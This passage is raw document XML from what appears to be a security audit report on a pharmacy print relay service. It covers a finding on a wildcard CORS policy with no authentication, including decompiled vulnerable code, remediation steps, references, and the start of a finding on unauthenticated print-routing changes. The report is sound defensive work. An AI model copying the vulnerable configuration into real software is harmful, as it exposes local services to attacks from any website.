        <w:t xml:space="preserve">    options.AddPolicy(POLICY_NAME,   // policy name is defined as a constant builder =&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        builder</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            .AllowAnyOrigin()      // VULNERABLE: any website may call the relay</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            .AllowAnyHeader()      // VULNERABLE: any header accepted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            .WithMethods("GET", "POST", "OPTIONS");</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Startup.Configure() — policy applied globally</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>app.UseCors(POLICY_NAME);   // affects every endpoint</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>// Note: no UseAuthentication()/UseAuthorization() m</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>iddleware in the pipeline.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>// Resulting response header:  Access-Control-Allow-Origin: *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01056EDD" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="009F2D8A"/>
    <w:p w14:paraId="487AC00B" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Reconstructed CORS policy builder (decompiled from IL, Startup.ConfigureServices):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282642D6" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="009C1336">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EDECCB4" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>services.AddCors(options =&gt; options.AddPolicy(CorsPolicyName, builder =&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246001BD" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122F7C2A" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    builder.AllowAnyOrigin()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BB1C31" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">           .WithMethods("GET", "POST", "OPTIONS")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3561D7" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">           .AllowAnyHeader();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF72702" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>}));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA05084" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>// Startup.Configure: app.UseCors(CorsPolicyName); app.UseMvc();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3DBB29" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>// Note: no UseAuthentication()/UseAuthorization() middleware in the pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D41DA40" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="009C1336">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="125EB899" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Kestrel binding (decompiled): options.Listen(IPAddress.Loopback, int.Parse(Settings.Port)</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>); —</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> loopback only, but reachable cross-origin from the browser due to the policy above.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DC760F" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>Attack Path (Executive View)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62AA0B4B" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32087A42" wp14:editId="0A470FAB">
            <wp:extent cx="5943600" cy="42145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exec.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="4214553"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="30802107" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Figure F4 — Attack path: the permissive cross-origin policy lets any website reach the local service, turning F1/F3 into a remote, click-only attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7FC8C8" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="009F2D8A"/>
    <w:p w14:paraId="4746862F" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>REMEDIATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779697A1" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="505050"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Goal: allow only the company’s own approved web application(s) to call the service — never "any website".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67440488" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Step 1. Replace AllowAnyOrigin with an explicit allowlist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376EB7CA" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:pStyle w:val="ListBullet2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>List only the exact HTTPS origin(s) of the ScriptMed web app that legitimately drive printing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8D86D1" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>services.AddCors(o =&gt; o.AddPolicy("ScriptMedOnly", b =&gt; b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    .WithOrigins("https://app.scriptmed.example")   // exact origin(s) only</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    .WithMethods("GET", "POST")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    .WithHeaders("Authorization", "Content-Type")));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2979CFE0" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Step 2. Apply the named policy (drop the permissive policy)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412896F2" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:pStyle w:val="ListBullet2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Use the restrictive policy and place UseCors between routing and authorization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D33A232" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>app.UseRouting();</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t>app.UseCors("ScriptMedOnly");   // replaces app.UseCors(POLICY_NAME)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t>app.UseAuthentication();</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t>app.UseAuthorization();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E241AA" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Step 3. Add a request-authenticity control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12FDE702" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:pStyle w:val="ListBullet2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Because origin headers can be spoofed outside browsers, add a per-session shared secret or anti-CSRF handshake between the web app and the relay so origin alone is not the only gate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3193FFCF" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Step 4. Never pair a wildcard origin with broad headers/methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C97800" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:pStyle w:val="ListBullet2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Confirm no remaining policy combines AllowAnyOrigin with AllowAnyHeader.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0D5CA2" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E9F7EF"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">✔ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Verify: (1) a fetch() from an unlisted origin is blocked by the browser (no CORS headers returned); (2) the approved app still works; (3) the response no longer contains Access-Control-Allow-Origin: *.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A79B61" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="009F2D8A"/>
    <w:p w14:paraId="1D009AB4" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>REFERENCES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3BA34A" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>CWE-942: Permissive Cross-domain Policy with Untrusted Domains — cwe.mitre.org/data/definitions/942.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F414B0" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>CWE-346: Origin Validation Error — cwe.mitre.org/data/definitions/346.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CA96BB" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>OWASP Top 10 2021 A05: Security Misconfiguration — owasp.org/Top10/A05_2021-Security_Misconfiguration/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0541E7" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="009C1336">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14D14E84" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20045883" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E5E1D94" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76740231" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B46CCCB" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71909D3A" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30441F8A" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="050B3686" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7633CD53" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F8CE5FE" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A541B15" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E94126F" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A94A34B" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="479D8F32"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34D8350A" w14:textId="77777777" w:rsidTr="002E6C25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7200" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1ABDF6B7" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
            <w:pPr>
              <w:pStyle w:val="Heading2"/>
              <w:ind w:left="0"/>
            </w:pPr>
            <w:bookmarkStart w:id="12" w:name="_Toc9000004"/>
            <w:bookmarkStart w:id="13" w:name="_Toc232079914"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>5. Unauthenticated Modification of the Print-Routing Map - Medium</w:t>
            </w:r>
            <w:bookmarkEnd w:id="12"/>
            <w:bookmarkEnd w:id="13"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EC7D31"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="04AE7C03"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Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="65779214" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372BF41D"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Medium</w:t>
      </w:r>
      <w:r w:rsidRPr="00711F1D">
        <w:rPr>
          <w:b/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">  |  CVSS 3.1: 5.0 (</w:t>
      </w:r>
      <w:r w:rsidRPr="00711F1D">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L</w:t>
      </w:r>
      <w:r w:rsidRPr="00711F1D">
        <w:rPr>
          <w:b/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C40D720" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Affected component: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PrintController.SetPrintDocTypeMap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> — endpoints </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>/printers/print-doc-type-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>map/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>printDocType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>/printers/print-doc-type-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>map/{printDocType}/{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>printQueueName}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E89B141" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The endpoint that creates, updates, and deletes the mapping between document types and physical print queues performs no authentication or authorization. It reads the current map, applies the caller's change (including a DELETE operation), and persists the result to disk via File.WriteAllText. Any local process, or — via the permissive CORS policy — any website the user visits, can therefore remap a document type to a different local queue or delete mappings entirely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1361E129" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The integrity and availability impact is meaningful: an attacker can cause documents of a given type to be routed to an unintended queue, or break printing for a document type by removing its mapping. In a specialty-pharmacy workflow this can misdirect or suppress the printing of sensitive material.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D078D81" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>EVIDENCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CC5CC4" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>Code Source Tracking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0F88F1" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Binary File:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>DesktopPrintRelayService.Host.exe (v1.0.0.5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B05792A"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7C062482" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Namespace:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ScriptMed.DesktopPrintRelayService</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B390C8" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Class:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>PrintController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC5FE62" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Method:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>SetPrintDocTypeMap()  —  endpoints /printers/print-doc-type-maps (POST/DELETE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBCB224" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
